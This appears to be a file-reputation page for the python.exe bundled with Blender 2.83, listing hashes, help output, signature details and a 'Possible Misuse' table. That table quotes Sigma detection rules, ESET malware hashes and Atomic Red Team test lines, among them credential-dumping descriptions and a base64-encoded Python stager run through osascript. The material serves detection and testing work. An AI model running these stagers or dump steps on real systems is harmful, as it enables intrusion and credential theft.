python.exe

  • File Path: C:\Program Files\Blender Foundation\Blender 2.83\2.83\python\bin\python.exe
  • Description: Python

Hashes

Type Hash
MD5 3FE8936968A3EBFFF4AC920E85488F38
SHA1 A1F5E3D37FB1FA0B393FDB9A5558D2CCD157DF85
SHA256 FDD16C500862B6943DBC17C5AC85946E1372813EFC6E34EDBED5CE6D0F0A19BB
SHA384 1669F1EE9077CAA1E16A5AE64EE5EEBED683519514087FA23D686DCA906CB526B4511DF6918F7A1096196D8D87ACDF01
SHA512 58603554C678D2DDBB0F2E2D18F2045A1ADFFAE7C07111721EEB4EFA029DD7FFD6920A5B52BEA4A76F7B7045EA255C935ECAD4B0B9552DB8D3A287441D66B428
SSDEEP 1536:nmkGuKS0IzbuEYE+9z2wp+FavGmhMn+IhzZtz8/iXRPuW4DpKx:m7uO4buAs0FNmhMn+IhN2/iXR77

Runtime Data

Usage (stdout):

usage: C:\Program Files\Blender Foundation\Blender 2.83\2.83\python\bin\python.exe [option] ... [-c cmd | -m mod | file | -] [arg] ...
Options and arguments (and corresponding environment variables):
-b     : issue warnings about str(bytes_instance), str(bytearray_instance)
         and comparing bytes/bytearray with str. (-bb: issue errors)
-B     : don't write .pyc files on import; also PYTHONDONTWRITEBYTECODE=x
-c cmd : program passed in as string (terminates option list)
-d     : debug output from parser; also PYTHONDEBUG=x
-E     : ignore PYTHON* environment variables (such as PYTHONPATH)
-h     : print this help message and exit (also --help)
-i     : inspect interactively after running script; forces a prompt even
         if stdin does not appear to be a terminal; also PYTHONINSPECT=x
-I     : isolate Python from the user's environment (implies -E and -s)
-m mod : run library module as a script (terminates option list)
-O     : remove assert and __debug__-dependent statements; add .opt-1 before
         .pyc extension; also PYTHONOPTIMIZE=x
-OO    : do -O changes and also discard docstrings; add .opt-2 before
         .pyc extension
-q     : don't print version and copyright messages on interactive startup
-s     : don't add user site directory to sys.path; also PYTHONNOUSERSITE
-S     : don't imply 'import site' on initialization
-u     : force the stdout and stderr streams to be unbuffered;
         this option has no effect on stdin; also PYTHONUNBUFFERED=x
-v     : verbose (trace import statements); also PYTHONVERBOSE=x
         can be supplied multiple times to increase verbosity
-V     : print the Python version number and exit (also --version)
         when given twice, print more information about the build
-W arg : warning control; arg is action:message:category:module:lineno
         also PYTHONWARNINGS=arg
-x     : skip first line of source, allowing use of non-Unix forms of #!cmd
-X opt : set implementation-specific option
--check-hash-based-pycs always|default|never:
    control how Python invalidates hash-based .pyc files
file   : program read from script file
-      : program read from stdin (default; interactive mode if a tty)
arg ...: arguments passed to program in sys.argv[1:]

Other environment variables:
PYTHONSTARTUP: file executed on interactive startup (no default)
PYTHONPATH   : ';'-separated list of directories prefixed to the
               default module search path.  The result is sys.path.
PYTHONHOME   : alternate <prefix> directory (or <prefix>;<exec_prefix>).
               The default module search path uses <prefix>\python{major}{minor}.
PYTHONCASEOK : ignore case in 'import' statements (Windows).
PYTHONIOENCODING: Encoding[:errors] used for stdin/stdout/stderr.
PYTHONFAULTHANDLER: dump the Python traceback on fatal errors.
PYTHONHASHSEED: if this variable is set to 'random', a random value is used
   to seed the hashes of str, bytes and datetime objects.  It can also be
   set to an integer in the range [0,4294967295] to get hash values with a
   predictable seed.
PYTHONMALLOC: set the Python memory allocators and/or install debug hooks
   on Python memory allocators. Use PYTHONMALLOC=debug to install debug
   hooks.
PYTHONCOERCECLOCALE: if this variable is set to 0, it disables the locale
   coercion behavior. Use PYTHONCOERCECLOCALE=warn to request display of
   locale coercion and locale compatibility warnings on stderr.
PYTHONBREAKPOINT: if this variable is set to 0, it disables the default
   debugger. It can be set to the callable of your debugger of choice.
PYTHONDEVMODE: enable the development mode.

Usage (stderr):

Unknown option: -e
usage: C:\Program Files\Blender Foundation\Blender 2.83\2.83\python\bin\python.exe [option] ... [-c cmd | -m mod | file | -] [arg] ...
Try `python -h' for more information.

Signature

  • Status: Signature verified.
  • Serial: 0FC2CFDD6D5AD878EA6A7AFB6D7A5CD2
  • Thumbprint: 18A976606F95649BB479D1934F21F2AC37D642A8
  • Issuer: CN=SSL.com Code Signing Intermediate CA RSA R1, O=SSL Corp, L=Houston, S=Texas, C=US
  • Subject: CN=Stichting Blender Foundation, O=Stichting Blender Foundation, L=Amsterdam, S=Noord-Holland, C=NL

File Metadata

  • Original Filename: python.exe
  • Product Name: Python
  • Company Name: Python Software Foundation
  • File Version: 3.7.4
  • Product Version: 3.7.4
  • Language: Language Neutral
  • Legal Copyright: Copyright 2001-2016 Python Software Foundation. Copyright 2000 BeOpen.com. Copyright 1995-2001 CNRI. Copyright 1991-1995 SMC.

File Similarity (ssdeep match)

File Score
C:\Program Files (x86)\Python310-32\Lib\venv\scripts\nt\python.exe 38
C:\Program Files (x86)\Python310-32\python.exe 72
C:\program files (x86)\Python38-32\python.exe 71
C:\program files\Blender Foundation\Blender 2.83\2.83\python\bin\python.exe 96
C:\Program Files\Blender Foundation\Blender 2.90\2.90\python\bin\python.exe 88
C:\Program Files\Inkscape\bin\python.exe 74
C:\program files\Inkscape\bin\python.exe 69
C:\program files\LibreOffice\program\python-core-3.7.7\bin\python.exe 74
C:\Program Files\Python310\Lib\venv\scripts\nt\python.exe 40
C:\Program Files\Python310\python.exe 72
C:\Program Files\Python38\python.exe 72

Possible Misuse

The following table contains possible examples of python.exe being misused. While python.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma sigma-test.yml # This workflow will install Python dependencies, run tests and lint with a single version of Python DRL 1.0
sigma sigma-test.yml # For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions DRL 1.0
sigma sigma-test.yml - name: Set up Python 3.8 DRL 1.0
sigma sigma-test.yml uses: actions/setup-python@v1 DRL 1.0
sigma sigma-test.yml python-version: 3.8 DRL 1.0
sigma sigma-test.yml python -m pip install --upgrade pip DRL 1.0
sigma app_python_sql_exceptions.yml title: Python SQL Exceptions DRL 1.0
sigma app_python_sql_exceptions.yml description: Generic rule for SQL exceptions in Python according to PEP 249 DRL 1.0
sigma app_python_sql_exceptions.yml - https://www.python.org/dev/peps/pep-0249/#exceptions DRL 1.0
sigma app_python_sql_exceptions.yml product: python DRL 1.0
sigma lnx_shell_susp_commands.yml - 'python -m SimpleHTTPServer' DRL 1.0
sigma lnx_shell_susp_commands.yml - '-m http.server' # Python 3 DRL 1.0
sigma proc_creation_macos_screencapture.yml - https://github.com/BC-SECURITY/Empire/blob/master/lib/modules/python/collection/osx/screenshot.py DRL 1.0
sigma web_exchange_exploitation_hafnium.yml - 'python-requests/2.19.1' DRL 1.0
sigma web_exchange_exploitation_hafnium.yml - 'python-requests/2.25.1' DRL 1.0
sigma sysmon_suspicious_remote_thread.yml - '\python.exe' DRL 1.0
sigma image_load_susp_python_image_load.yml title: Python Py2Exe Image Load DRL 1.0
sigma image_load_susp_python_image_load.yml description: Detects the image load of Python Core indicative of a Python script bundled with Py2Exe. DRL 1.0
sigma image_load_susp_python_image_load.yml Description: 'Python Core' DRL 1.0
sigma image_load_susp_python_image_load.yml - 'Python' # FPs with python38.dll, python.exe etc. DRL 1.0
sigma net_connection_win_python.yml title: Python Initiated Connection DRL 1.0
sigma net_connection_win_python.yml - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python DRL 1.0
sigma net_connection_win_python.yml Image\|contains: python DRL 1.0
sigma net_connection_win_python.yml - Legitimate python script DRL 1.0
sigma proc_access_win_pypykatz_cred_dump_lsass_access.yml - 'python3*.dll+' # Pypy requires python>=3.6 DRL 1.0
sigma proc_creation_win_pypykatz.yml - \python.exe DRL 1.0
sigma proc_creation_win_susp_adidnsdump.yml This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed, DRL 1.0
sigma proc_creation_win_susp_adidnsdump.yml Image\|endswith: \python.exe DRL 1.0
sigma proc_creation_win_webshell_recon_detection.yml description: Looking for processes spawned by web server components that indicate reconnaissance by popular public domain webshells for whether perl, python or wget are installed. DRL 1.0
sigma proc_creation_win_webshell_recon_detection.yml - 'python --help' DRL 1.0
sigma registry_event_asep_reg_keys_modification_currentversion.yml Details\|contains: '\AppData\Local\Package Cache\{c60fd5ac-367d-4e3a-a975-f157502ac30a}\python' DRL 1.0
sigma arcsight.yml python: DRL 1.0
sigma arcsight.yml product: python DRL 1.0
sigma arcsight.yml deviceProduct: Python DRL 1.0
sigma sumologic-cse.yml application-python: DRL 1.0
sigma sumologic-cse.yml product: python DRL 1.0
sigma sumologic.yml application-python: DRL 1.0
sigma sumologic.yml product: python DRL 1.0
LOLBAS Testxlst.yml Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).  
malware-ioc evilnum Python/Agent.JM © ESET 2014-2018
malware-ioc evilnum Python/TrojanProxy.Agent.B © ESET 2014-2018
malware-ioc evilnum Python/Spy.KeyLogger.HF © ESET 2014-2018
malware-ioc evilnum Python/RiskWare.LaZagne.D © ESET 2014-2018
malware-ioc evilnum Python/Pyvil.A © ESET 2014-2018
malware-ioc misp-machete-event.json "value": "Python/Machete.A", © ESET 2014-2018
malware-ioc misp-machete-event.json "value": "Python/Machete.B", © ESET 2014-2018
malware-ioc misp-machete-event.json "value": "Python/Machete.C", © ESET 2014-2018
malware-ioc misp-machete-event.json "value": "Python/Machete.D", © ESET 2014-2018
malware-ioc misp-machete-event.json "value": "Python/Machete.E", © ESET 2014-2018
malware-ioc misp-machete-event.json "value": "Python/Machete.F", © ESET 2014-2018
malware-ioc misp-machete-event.json "value": "Python/Machete.G", © ESET 2014-2018
malware-ioc misp-machete-event.json "value": "Python.27.exe", © ESET 2014-2018
malware-ioc machete \|048C40EB606DA3DEF08C9F6997C1948AFBBC959B\|Python/Machete.F © ESET 2014-2018
malware-ioc machete \|2E8D8508096CAA38493414F6BA788D0041EA9E15\|Python/Machete.F © ESET 2014-2018
malware-ioc machete \|85BDD7D871108C737701AC30C14A2D343CBDEF94\|Python/Machete.D © ESET 2014-2018
malware-ioc machete \|8ED8CB784512F7DADD147347FC94E945FAF16338\|Python/Machete.F © ESET 2014-2018
malware-ioc machete \|9C413075AAB7EF7876B8DC8D7B7C1B9B96842C6E\|Python/Machete.A © ESET 2014-2018
malware-ioc machete \|AB8DD6B0CC950618589603012863B57F7ADB9D9B\|Python/Machete.A © ESET 2014-2018
malware-ioc machete \|318496B58CF5052EFD49A95C721D9165278E9FCE\|Python/Machete.B © ESET 2014-2018
malware-ioc machete \|3BB345032B6D0226D6771BA65FE4DA0FAF628631\|Python/Machete.B © ESET 2014-2018
malware-ioc machete \|946A24DFBD0AE94209EF7C284D3F462548566A3C\|Python/Machete.B © ESET 2014-2018
malware-ioc machete \|984B9202A6DBD7D3DD696CAE1220338A68092DC9\|Python/Machete.B © ESET 2014-2018
malware-ioc machete \|EABD45D0A86113F5CCFF9FD292C1E482A5727815\|Python/Machete.B © ESET 2014-2018
malware-ioc machete \|F05BC018C90B560DC4932758956ADFFBC10588CE\|Python/Machete.B © ESET 2014-2018
malware-ioc machete \|204A2850548E5994D4696E9002F90DFCCBE2093A\|Python/Machete.C © ESET 2014-2018
malware-ioc machete \|3792588EDC809270E6666A4677EC85A3400BA4CF\|Python/Machete.E © ESET 2014-2018
malware-ioc machete \|4899A2C2CECEB92D2CC4ED17D092D1D599379284\|Python/Machete.A © ESET 2014-2018
malware-ioc machete \|A42756280AA352F4612BED85AABF7F3267E676C2\|Python/Machete.E © ESET 2014-2018
malware-ioc machete \|A97CF05AD7F3102BDE45E4B4947ED435EFEA1968\|Python/Machete.E © ESET 2014-2018
malware-ioc machete \|C4ACCF6071F51ADE102190C6FA350435FC202654\|Python.27.exe © ESET 2014-2018
malware-ioc machete \|D5238CDE036EEFCC6D8D686B3A00247F27DA894C\|Python.27.exe © ESET 2014-2018
malware-ioc machete \|2B7404F6B0075BC1192D61D4AF135D521D5F08A3\|RdrCEF.exe\|Python/Machete.A © ESET 2014-2018
malware-ioc machete \|53102E57B40FEACB64566C26D101D9242DECE77C\|Down.exe\|Python/Machete.A © ESET 2014-2018
malware-ioc machete \|56E8743E0773286A4B9E055147D96D53A43BECA1\|Down.exe\|Python/Machete.A © ESET 2014-2018
malware-ioc machete \|71F69F04307C8F5675DCADEAA80B8C2B95691B01\|Down.exe\|Python/Machete.A © ESET 2014-2018
malware-ioc machete \|904137B61F1DED66C8CA76EBF198DEC1B638B5D4\|Down.exe\|Python/Machete.A © ESET 2014-2018
malware-ioc machete \|FBB485B40477F5A014E7096747B1B4A494CE50EF\|Down.exe\|Python/Machete.A © ESET 2014-2018
malware-ioc machete \|1B3723651E1D321D4F34F2A243D7751D17288257\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|7FFB9C7DA20C536B694E78538B65726EACB1B055\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|B1ADF4B46350FB801CE54DA9C93A4EF79674F3F5\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|0C33B75F6C4FC0413ABDBCDA1C5E18C907F13DC3\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|314D9B4C25DD69453D86E4C7062DCE6DEDDA0533\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|D4CF22F3DB78BDC1CEB55431857D88166CE677D4\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|26FB301AF7393B5E564B8C802F5795EDEBD7CECF\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|979859B5A177650EF0549C81FD66D36E9DEA8078\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|A07E38DF9887EA7811369CD72C57FD6D44523CD6\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|07E383E9FF04F587769845306DC4BFE75630BAAA\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|3B6F5CB20FF3AC0EE3813A68A937AAE92EBC46D3\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|56765B7511372A8E9BE017F48A764D141F485474\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|CF2DC40926D8747AEC572DFD711BBFD766AADB10\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|6B42091CA2F89A59F4E27E30ACDACF32EB83F824\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|708F159F2CFE22FF0C4464F2FEDAA0501868BDD8\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|DE639618B550DBE9071E999AAA5B4FC81F63A5A6\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|0B6F61AF3E2C6551F15E0F888177EEC91F20BA99\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|76AABC0AF5D487A80BCBA19555191B46766139FA\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|7FF87649CA1D9178A02CD9942856D1B590652C6E\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|8692EB1E620F2BCDDAF28F0CB726CEC2AA1C230D\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|8AF19AA3F18CB35F12EE3966931E11799C3AC5A4\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|E1BC4EC7F82FA06924DC4B43FBBB485D8C86D9CD\|Python/Machete.G © ESET 2014-2018
malware-ioc vf_ioc_linux_rakos.py # 2) Run: python vol.py -f dump_from_compromise_linux_system.vmem © ESET 2014-2018
malware-ioc misp-telebots.json "comment": "Python\/TeleBot.AA backdoor - Xchecked via VT: 57dad9cda501bc8f1d0496ef010146d9a1d3734f", © ESET 2014-2018
malware-ioc misp-telebots.json "comment": "Python\/TeleBot.AA backdoor - Xchecked via VT: 385f26d29b46ff55c5f4d6bbfd3da12eb5c33ed7", © ESET 2014-2018
malware-ioc misp-telebots.json "comment": "Python\/TeleBot.AA backdoor - Xchecked via VT: 16c206d9cfd4c82d6652afb1eebb589a927b041b", © ESET 2014-2018
malware-ioc misp-telebots.json "comment": "Python\/TeleBot.AA backdoor", © ESET 2014-2018
malware-ioc telebots - Python/TeleBot.AA trojan © ESET 2014-2018
malware-ioc telebots - Python/Agent.Q trojan © ESET 2014-2018
malware-ioc telebots - Python/Agent.AE trojan © ESET 2014-2018
malware-ioc telebots - Python/Agent.AD trojan © ESET 2014-2018
malware-ioc telebots === Python/TeleBot.AA backdoor © ESET 2014-2018
atomic-red-team index.md - Atomic Test #2: Dump individual process memory with Python (Local) [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Compressing data using GZip in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Compressing data using bz2 in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Compressing data using zipfile in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #4: Compressing data using tarfile in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Base64 decoding with Python [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #4: Port Scan using python [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - T1059.006 Python MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Execute shell script via python’s command mode arguement [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Execute Python via scripts (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Execute Python via Python executables (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #2: Dump individual process memory with Python (Local) [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #1: Compressing data using GZip in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #2: Compressing data using bz2 in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #3: Compressing data using zipfile in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #4: Compressing data using tarfile in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #3: Base64 decoding with Python [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - T1059.006 Python MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #1: Execute shell script via python’s command mode arguement [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #2: Execute Python via scripts (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #3: Execute Python via Python executables (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team macos-index.md - Atomic Test #3: Base64 decoding with Python [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team macos-index.md - T1059.006 Python CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #4: Port Scan using python [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1059.006 Python CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team linux-matrix.md | Spearphishing via Service CONTRIBUTE A TEST | Python | Create or Modify System Process CONTRIBUTE A TEST | Event Triggered Execution CONTRIBUTE A TEST | Deploy Container CONTRIBUTE A TEST | Man-in-the-Middle CONTRIBUTE A TEST | Local Groups | | Data from Network Shared Drive CONTRIBUTE A TEST | Scheduled Transfer CONTRIBUTE A TEST | External Proxy CONTRIBUTE A TEST | Inhibit System Recovery CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team macos-matrix.md | Spearphishing Link CONTRIBUTE A TEST | Python CONTRIBUTE A TEST | Dylib Hijacking CONTRIBUTE A TEST | Event Triggered Execution CONTRIBUTE A TEST | Domain Accounts CONTRIBUTE A TEST | Keychain | Network Sniffing | | Data from Network Shared Drive CONTRIBUTE A TEST | Exfiltration over USB CONTRIBUTE A TEST | Domain Generation Algorithms CONTRIBUTE A TEST | Endpoint Denial of Service CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | Python | Compromise Client Software Binary CONTRIBUTE A TEST | DLL Side-Loading | Create Snapshot CONTRIBUTE A TEST | Kerberoasting | Process Discovery | | Local Data Staging | | Multi-hop Proxy | Stored Data Manipulation CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | Spearphishing Link CONTRIBUTE A TEST | Python CONTRIBUTE A TEST | Browser Extensions | COR_PROFILER | Compile After Delivery | Forced Authentication | Network Sniffing | Shared Webroot CONTRIBUTE A TEST | Data from Removable Media CONTRIBUTE A TEST | Exfiltration to Code Repository CONTRIBUTE A TEST | Encrypted Channel | Firmware Corruption CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Parses secrets hidden in the LSASS process with python. Similar to mimikatz’s sekurlsa:: MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Python 3 must be installed, use the get_prereq_command’s to meet the prerequisites for this test. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ##### Description: Computer must have python 3 installed MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md echo “Python 3 must be installed manually” MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md ##### Description: Computer must have python 3 installed MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md echo “Python 3 must be installed manually” MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md - Atomic Test #2 - Dump individual process memory with Python (Local) MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md ## Atomic Test #2 - Dump individual process memory with Python (Local) MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md Using /proc/$PID/mem, where $PID is the target process ID, use a Python script to MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md PYTHON=$(which python || which python3 || which python2) MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md $PYTHON #{python_script} $PID #{output_file} MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md ##### Description: Requires Python MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md (which python || which python3 || which python2) MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md echo “Python 2.7+ or 3.4+ must be installed” MIT License. © 2018 Red Canary
atomic-red-team T1018.md Python 3 and adidnsdump must be installed, use the get_prereq_command’s to meet the prerequisites for this test. MIT License. © 2018 Red Canary
atomic-red-team T1018.md ##### Description: Computer must have python 3 installed MIT License. © 2018 Red Canary
atomic-red-team T1018.md if (python –version) {exit 0} else {exit 1} MIT License. © 2018 Red Canary
atomic-red-team T1018.md echo “Python 3 must be installed manually” MIT License. © 2018 Red Canary
atomic-red-team T1036.006.md 1. echo ‘#!/bin/bash\necho “print "hello, world!"” | /usr/bin/python\nexit’ > execute.txt && chmod +x execute.txt MIT License. © 2018 Red Canary
atomic-red-team T1046.md - Atomic Test #4 - Port Scan using python MIT License. © 2018 Red Canary
atomic-red-team T1046.md ## Atomic Test #4 - Port Scan using python MIT License. © 2018 Red Canary
atomic-red-team T1046.md Scan ports to check for listening ports with python MIT License. © 2018 Red Canary
atomic-red-team T1046.md python #{filename} -i #{host_ip} MIT License. © 2018 Red Canary
atomic-red-team T1046.md ##### Description: Check if python exists on the machine MIT License. © 2018 Red Canary
atomic-red-team T1046.md if (python –version) {exit 0} else {exit 1} MIT License. © 2018 Red Canary
atomic-red-team T1046.md echo “Python 3 must be installed manually” MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded. MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md 2. Using Python to establish a one-line HTTP server on victim system: MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md python -m SimpleHTTPServer 1337 MIT License. © 2018 Red Canary
atomic-red-team T1059.002.md Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they’re already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute Native APIs, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via Python.(Citation: Macro Malware Targets Macs)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1059.002.md Shell Script with AppleScript. The encoded python script will perform an HTTP GET request to 127.0.0.1:80 with a session cookie of “t3VhVOs/DyCcDTFzIKanRxkvk3I=”, unless ‘Little Snitch’ is installed, in which case it will just exit. MIT License. © 2018 Red Canary
atomic-red-team T1059.002.md osascript -e “do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings(‘ignore’);exec(base64.b64decode(‘aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg==’));\" | python &"” MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md # T1059.006 - Python MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md <blockquote>Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables. MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md - Atomic Test #1 - Execute shell script via python’s command mode arguement MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md - Atomic Test #2 - Execute Python via scripts (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md - Atomic Test #3 - Execute Python via Python executables (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md ## Atomic Test #1 - Execute shell script via python’s command mode arguement MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md Download and execute shell script and write to file then execute locally using Python -c (command mode) MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md which_python=$(which python || which python3 || which python2) MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md ##### Description: Verify if python is in the environment variable path and attempt to import requests library. MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md which_python=$(which python || which python3 || which python2); $which_python -V MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md ## Atomic Test #2 - Execute Python via scripts (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md Create Python file (.py) that downloads and executes shell script via executor arguments MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md | python_script_name | Python script name | Path | T1059.006.py| MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md ##### Description: Requires Python MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md ## Atomic Test #3 - Execute Python via Python executables (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md | python_script_name | Name of Python script name | Path | T1059.006.py| MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md | python_binary_name | Name of Python file to be compiled | Path | T1059.006.pyc| MIT License. © 2018 Red Canary
atomic-red-team T1140.md - Atomic Test #3 - Base64 decoding with Python MIT License. © 2018 Red Canary
atomic-red-team T1140.md ## Atomic Test #3 - Base64 decoding with Python MIT License. © 2018 Red Canary
atomic-red-team T1140.md Use Python to decode a base64-encoded text string and echo it to the console MIT License. © 2018 Red Canary
atomic-red-team T1140.md ##### Description: Python must be present MIT License. © 2018 Red Canary
atomic-red-team T1140.md echo “Please install Python 3” MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md <blockquote>An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including Python rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data. MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md - Atomic Test #1 - Compressing data using GZip in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md - Atomic Test #2 - Compressing data using bz2 in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md - Atomic Test #3 - Compressing data using zipfile in Python (Linux) MIT License. © 2018 Red Canary
